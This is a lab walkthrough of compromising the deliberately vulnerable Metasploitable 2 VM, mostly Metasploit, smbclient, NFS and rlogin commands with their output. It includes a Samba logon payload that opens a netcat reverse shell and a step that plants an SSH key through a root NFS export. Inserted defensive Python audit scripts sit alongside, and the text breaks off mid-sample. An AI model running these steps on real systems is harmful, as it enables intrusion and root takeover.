Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution                                                                  


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script 
msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/meta
                                      sploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.135  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.204.135:4444 
ls
[*] Command shell session 1 opened (192.168.204.135:4444 -> 192.168.204.136:57884) at 2024-03-17 09:01:33 -0400

bin
boot
cdrom              

Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit

Use smbclient to connect to shares. We can see that we can connect anonymously.

┌──(kali㉿kali)-[~]
└─$ smbclient -L \\192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Here we have a tmp share that we can reach anonymously. The "username map script" bug is triggered by the username we present during session setup, so an anonymous connection to any share is enough to get a shell; write access is not needed for this part (it is used later for the symlink traversal).

Now connect to the share and list the available commands with help. Note the logon command, which re-authenticates the session with a username of our choosing:

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.204.136/tmp 
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..          

Now open a listener on the attacking machine:

nc -lnvp 4444

Then, inside the smbclient session, log on again with a username that carries a shell command in backticks:

logon "/=`nc 192.168.204.135 4444 -e /bin/bash`"

Samba's "username map script" setting hands the supplied username to /bin/sh, so the backticked nc command runs on the target and we get a root shell on our listener.

Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136                

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.204.136:445     Name: 192.168.204.136           Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))

Now, we can use a Metasploit module to exploit it.

┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use auxiliary/admin/smb/samba_symlink_traversal
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.204.136

[*] 192.168.204.136:445 - Connecting to the server...
[*] 192.168.204.136:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.204.136:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.204.136:445 - Now access the following share to browse the root filesystem:
[*] 192.168.204.136:445 -       \\192.168.204.136\tmp\rootfs\

[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/samba_symlink_traversal) > 

The tmp share now contains a rootfs entry that is a symlink to /, so we can browse the complete filesystem through it, for example /etc/passwd:

┌──(kali㉿kali)-[~]
└─$ smbclient  \\\\192.168.204.136\\tmp      
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd

Port 1524 Remote Shell Metasploitable2

We saw port 1524 open on the machine. We can fingerprint the running service with a version scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 1524 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 23:32 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).

PORT     STATE SERVICE   VERSION
1524/tcp open  bindshell Metasploitable root shell
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 seconds

We can see that we have a bind shell on the port. We can try connecting to it.

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 1524
(UNKNOWN) [192.168.204.136] 1524 (ingreslock) open
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# whoami
root
root@metasploitable:/# 

We have successfully connected to the backdoor.

Port 5900 VNC Exploitation Metasploitable2

First, scan the service.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p 5900 --script vuln 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 10:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).

PORT     STATE SERVICE VERSION
5900/tcp open  vnc     VNC (protocol 3.3)
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

The port is open, but the vuln scripts did not report any vulnerabilities. We will try to brute-force the VNC password with Metasploit.

Bruteforcing VNC Metasploit

Search for VNC auxiliary modules.

msf6 > search vnc

Matching Modules
================

   #   Name                                                                Disclosure Date  Rank       Check  Description
   -   ----                                                                ---------------  ----       -----  -----------
   0   auxiliary/scanner/vnc/ard_root_pw                                                    normal     No     Apple Remote Desktop Root Vulnerability
   1   auxiliary/server/capture/vnc                                                         normal     No     Authentication Capture: VNC
   47  exploit/windows/vnc/ultravnc_viewer_bof                             2008-02-06       normal     No     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow                                                                                                       
   48  auxiliary/scanner/vnc/vnc_none_auth                                                  normal     No     VNC Authentication None Detection
   49  auxiliary/scanner/vnc/vnc_login                                                      normal     No     VNC Authentication Scanner

We have the vnc_login module. Select the module and view its options.

msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > show options

Module options (auxiliary/scanner/vnc/vnc_login):

   Name              Current Setting                      Required  Description
   ----              ---------------                      --------  -----------
   BLANK_PASSWORDS   false                                no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                    yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                 no        Skip existing credentials stored in the current database (Accep
                                                                    ted: none, user, user&realm)
   PASSWORD                                               no        The password to test
   PASS_FILE         /usr/share/metasploit-framework/dat  no        File containing passwords, one per line
                     a/wordlists/vnc_passwords.txt
   Proxies                                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                 yes       The target host(s), see https://github.com/rapid7/metasploit-fr
                                                                    amework/wiki/Using-Metasploit
   RPORT             5900                                 yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                yes       Stop guessing when a credential works for a host
   THREADS           1                                    yes       The number of concurrent threads (max one per
   USERNAME          <BLANK>                              no        A specific username to authenticate as
   USERPASS_FILE                                          no        File containing users and passwords separated
                                                                    r per line
   USER_AS_PASS      false                                no        Try the username as the password for all user
   USER_FILE                                              no        File containing usernames, one per line
   VERBOSE           true                                 yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

Set the username to root and set the target. We will use the default Metasploit wordlist.

msf6 auxiliary(scanner/vnc/vnc_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.204.136:5900  - 192.168.204.136:5900 - Starting VNC login sweep
[!] 192.168.204.136:5900  - No active DB -- Credential data will not be saved!
[+] 192.168.204.136:5900  - 192.168.204.136:5900 - Login Successful: :password
[*] 192.168.204.136:5900  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) > 

Running the module reveals the password, which is password.

Now we can use vncviewer to connect to the target.

┌──(kali㉿kali)-[~]
└─$ vncviewer 192.168.204.136
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:

Port 6667 ircd Exploitation Metasploitable2

Scanning port 6667

First, scan the port with the vuln script to see if we get any useful information.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 6667 192.168.204.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:19 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: Host: irc.Metasploitable.LAN

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds

Nmap reports that the service looks like the trojaned version of UnrealIRCd.

Vulnerability Assessment

Let us see if searchsploit finds something.

┌──(kali㉿kali)-[~]
└─$ searchsploit unreal                                       
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service                                 | multiple/dos/22223.txt
Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities                              | multiple/remote/32363.txt
Epic Games Unreal Engine 436 - URL Directory Traversal                                             | multiple/remote/22224.txt
Epic Games Unreal Engine Logging Function - Remote Denial of Service                               | multiple/dos/30513.txt
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite                 | multiple/remote/24041.c
Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier                            | multiple/dos/21593.txt
Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String                            | multiple/dos/23799.txt
Unreal Commander 0.92 - Directory Traversal                                                        | windows/remote/30569.py
Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite              | multiple/remote/30521.txt
Unreal Engine - 'ReceivedRawBunch()' Denial of Service                                             | multiple/dos/34340.txt
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service                             | multiple/dos/32386.txt
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC)                 | multiple/dos/34261.txt
Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service                                | multiple/dos/32362.txt
Unreal Tournament - Remote Buffer Overflow (SEH)                                                   | windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)                             | linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)                           | windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)                                     | linux/remote/10032.rb
Unreal Tournament 2004 - Null Pointer Remote Denial of Service                                     | multiple/dos/32125.txt
Unreal Tournament 3 - Memory Corruption (Denial of Service)                                        | multiple/dos/32127.txt
Unreal Tournament 3 1.3 - Directory Traversal                                                      | windows/remote/6506.txt
Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service                                     | windows/dos/14414.txt
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                       | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                            | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                     | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                          | windows/dos/27407.pl
-------------------------------------------

We do have "UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)".

Unreal IRCD Exploitation with Metasploit

Let us fire up metasploit and exploit it.

msf6 > search unreal

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   1  exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)
   2  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136

Set the payload to cmd/unix/bind_ruby.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_ruby 
payload => cmd/unix/bind_ruby

Now run it, and we will get the shell.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.204.136:6667 - Connected to 192.168.204.136:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.204.136:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.135:38267 -> 192.168.204.136:4444) at 2024-03-19 10:26:45 -0400

ls
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf

Port 2049 NFS Exploitation Metasploitable 2

First quickly scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 2049  192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 02:30 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).

PORT     STATE SERVICE
2049/tcp open  nfs
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

The port is open. Now let us list the NFS exports that are available to mount.

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136
Export list for 192.168.204.136:
/ *

The command showmount -e 192.168.204.136 lists the directories exported by the NFS (Network File System) server at 192.168.204.136.

The output shows that one directory is exported. Breaking it down:

  • Export list for 192.168.204.136:: the header line; what follows is the list of directories exported (shared) by the NFS server at that address.

  • / *: the exported directory and the hosts allowed to mount it. / is the root directory of the file system, and * means it is exported to all hosts: any host that can reach the NFS server can mount this directory and access its contents.

In summary, the NFS server at 192.168.204.136 is exporting its root directory (/) to every host on the network.
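As an added example (not part of the original walkthrough), here is a Python audit that parses showmount -e output and /etc/exports and flags exports that are world-mountable, writable, or leave remote root unsquashed. The showmount sample reproduces the export seen above plus a constructed restricted export; the /etc/exports content is an assumption, since the page only shows the client-side view. One caveat the page does not state: the later step of writing into /mnt/nfs/root/.ssh as root only works when the export carries no_root_squash, which is exactly what this audit reports.

```python
import re

# Constructed sample of `showmount -e` output. The first export is the one seen above;
# the second is invented to show a restricted export.
SHOWMOUNT_OUTPUT = """\
Export list for 192.168.204.136:
/            *
/srv/backups 10.0.0.0/24,10.0.1.5
"""

# Constructed /etc/exports content (assumed, not read from the target).
EXPORTS_FILE = """\
# NFS exports (constructed sample)
/            *(rw,no_root_squash)
/srv/backups 10.0.0.0/24(ro) 10.0.1.5(rw)
"""


def parse_showmount(text):
    """Map each exported path to its list of allowed clients, from `showmount -e` output."""
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        clients = parts[1] if len(parts) > 1 else ""
        exports[parts[0]] = [c for c in clients.split(",") if c]
    return exports


def world_exports(exports):
    """Paths that any host may mount: client '*' or showmount's '(everyone)'."""
    return [p for p, clients in exports.items()
            if any(c in ("*", "(everyone)") for c in clients)]


def parse_exports(text):
    """Return (path, client, options) tuples from /etc/exports text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = re.fullmatch(r"([^(]+)(?:\(([^)]*)\))?", spec)
            host = m.group(1)
            opts = set(m.group(2).split(",")) if m.group(2) else set()
            entries.append((path, host, opts))
    return entries


def audit_exports(entries):
    """Flag exports that are world-mountable, writable, or keep remote root unsquashed."""
    report = []
    for path, host, opts in entries:
        issues = []
        if host == "*":
            issues.append("world")
        if "rw" in opts:
            issues.append("rw")
        if "no_root_squash" in opts:  # remote uid 0 keeps root rights on the export
            issues.append("no_root_squash")
        if issues:
            report.append((path, host, issues))
    return report


if __name__ == "__main__":
    print("world-mountable:", world_exports(parse_showmount(SHOWMOUNT_OUTPUT)))
    for path, host, issues in audit_exports(parse_exports(EXPORTS_FILE)):
        print(f"{path} -> {host}: {', '.join(issues)}")
```

The fix on the server side is to replace the bare * with the hosts or subnets that need the export, drop rw where read access is enough, and keep the default root_squash so a remote root cannot write files owned by uid 0.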

Now, we can mount it.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali: 
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.204.136:/ /mnt/nfs

Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /usr/lib/systemd/system/rpc-statd.service.

┌──(kali㉿kali)-[~]
└─$ df -k
Filesystem        1K-blocks     Used Available Use% Mounted on
udev                1963284        0   1963284   0% /dev
tmpfs                401016     1268    399748   1% /run
/dev/sda1          82083148 14386412  63481188  19% /
tmpfs               2005072        0   2005072   0% /dev/shm
tmpfs                  5120        0      5120   0% /run/lock
tmpfs                401012      128    400884   1% /run/user/1000
192.168.204.136:/   7282176  1486656   5428544  22% /mnt/nfs

┌──(kali㉿kali)-[~]
└─$ cd /mnt/nfs
                                                                                                                                     
┌──(kali㉿kali)-[/mnt/nfs]
└─$ ls
bin   cdrom  etc   initrd      lib         media  nohup.out  proc  sbin  sys  usr  vmlinuz
boot  dev    home  initrd.img  lost+found  mnt    opt        root  srv   tmp  var

Now we can generate an SSH key.

┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fPlTqIgu9KBlLupk7ZEBlm9RZSNxmDvjuF7EBi4MqQw root@kali
The key's randomart image is:
+---[RSA 3072]----+
|     +==         |
| .. .o+ .        |
|E+ o  .          |
|B + ++ .   . .   |
|.+ =o+o S o . .  |
|  +.X. . o o .   |
| o X.+. . . o    |
|o +.=..      .   |
|oo.+ ..          |
+----[SHA256]-----+

Now copy the public key to the target's .ssh directory.

┌──(root㉿kali)-[~/.ssh]
└─# ls    
id_rsa  id_rsa.pub
                                                                                                                                                                       
┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt/nfs/root/.ssh/

Now, append it to the authorized_keys file.

┌──(root㉿kali)-[/mnt/nfs/root/.ssh]
└─# cat id_rsa.pub >> authorized_keys

We can now connect to the machine with SSH. (Having errors.)

Ports 512, 513, 514 remote services exploitation - Metasploitable 2

TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation).
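As an added example (not part of the original walkthrough), the Python audit below reads hosts.equiv and .rhosts style trust files and reports the wildcard entries that produce the "+ +" situation described above. The two trust files it checks are constructed samples, not files taken from the target.

```python
# Constructed sample trust files (not copied from the target).
HOSTS_EQUIV = """\
# hosts trusted for rsh/rlogin without a password
buildbox.example.internal
+
"""
ROOT_RHOSTS = """\
+ +
devbox.example.internal alice
"""


def parse_trust_file(text):
    """Return (host, user) pairs from hosts.equiv / .rhosts text; user is None when absent."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        rules.append((fields[0], fields[1] if len(fields) > 1 else None))
    return rules


def audit_trust_file(text, source):
    """List dangerous wildcard entries: '+' as host trusts every host, '+' as user every user."""
    findings = []
    for host, user in parse_trust_file(text):
        if host.startswith("-") or (user and user.startswith("-")):
            continue  # explicit deny entries are not a problem
        if host == "+" and user == "+":
            findings.append(f"{source}: '+ +' lets any user from any host log in without a password")
        elif host == "+":
            who = f"user {user}" if user else "the matching local account"
            findings.append(f"{source}: '+' trusts every host for {who}")
        elif user == "+":
            findings.append(f"{source}: every user on {host} is trusted")
    return findings


def audit_all(files):
    """files maps a label (path) to file contents; returns every finding in order."""
    out = []
    for source, text in files.items():
        out.extend(audit_trust_file(text, source))
    return out


if __name__ == "__main__":
    for line in audit_all({"/etc/hosts.equiv": HOSTS_EQUIV, "/root/.rhosts": ROOT_RHOSTS}):
        print(line)
```

Note that /etc/hosts.equiv is not consulted for root; root logins over rlogin and rsh depend only on root's own .rhosts, so that file deserves a separate check. The durable fix is to disable the r-services entirely (they transmit everything in clear text) and use SSH with key-based authentication instead.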

Let's scan to check whether these ports are open.

┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 512,513,514  192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:26 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00052s latency).

PORT    STATE SERVICE
512/tcp open  exec
513/tcp open  login
514/tcp open  shell
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Now we can connect to it.

┌──(kali㉿kali)-[/]
└─$ rlogin -l root 192.168.204.136
Last login: Sat Apr 27 02:22:48 EDT 2024 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

Port 3632 distccd exploitation - Metasploitable 2

distccd makes it easy to scale large compile jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run commands of their choice.

Let us scan it.

┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 3632 --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:47 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00058s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_      https://distcc.github.io/security.html
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds

We can now use Metasploit to exploit it.

msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136

msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf6 exploit(unix/misc/distcc_exec) > run

[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.137:44185 -> 192.168.204.136:4444) at 2024-04-27 04:54:44 -0400

id
uid=1(daemon) gid=1(daemon) 

Port 1099 - Java-rmi exploitation - Metasploitable 2

Let us first scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 1099 -sC -sV --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 01:11 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00088s latency).

PORT     STATE SERVICE  VERSION
1099/tcp open  java-rmi GNU Classpath grmiregistry
| rmi-vuln-classloader: 
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|       
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
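The vuln-script scans in the distccd and Java RMI sections above produce the same block structure: a script name, a VULNERABLE or NOT VULNERABLE header, a title, a State line and, sometimes, an IDs line carrying CVE numbers. As an added example (not part of the original walkthrough), this Python parser turns that normal-format output into a list of findings so that a scan across many hosts can be triaged without reading every block. The input is a constructed sample that copies the distcc and RMI blocks above and adds an invented NOT VULNERABLE block to show the filter; the vulners-style listing (bare IDs and scores without a State line) is deliberately not treated as a finding.

```python
import re

# Constructed sample of nmap normal output (the distcc and RMI blocks mirror the scans
# above; the NOT VULNERABLE ssl-poodle block is invented to exercise the filter).
NMAP_OUTPUT = """\
PORT     STATE SERVICE  VERSION
3632/tcp open  distccd
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|     References:
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687
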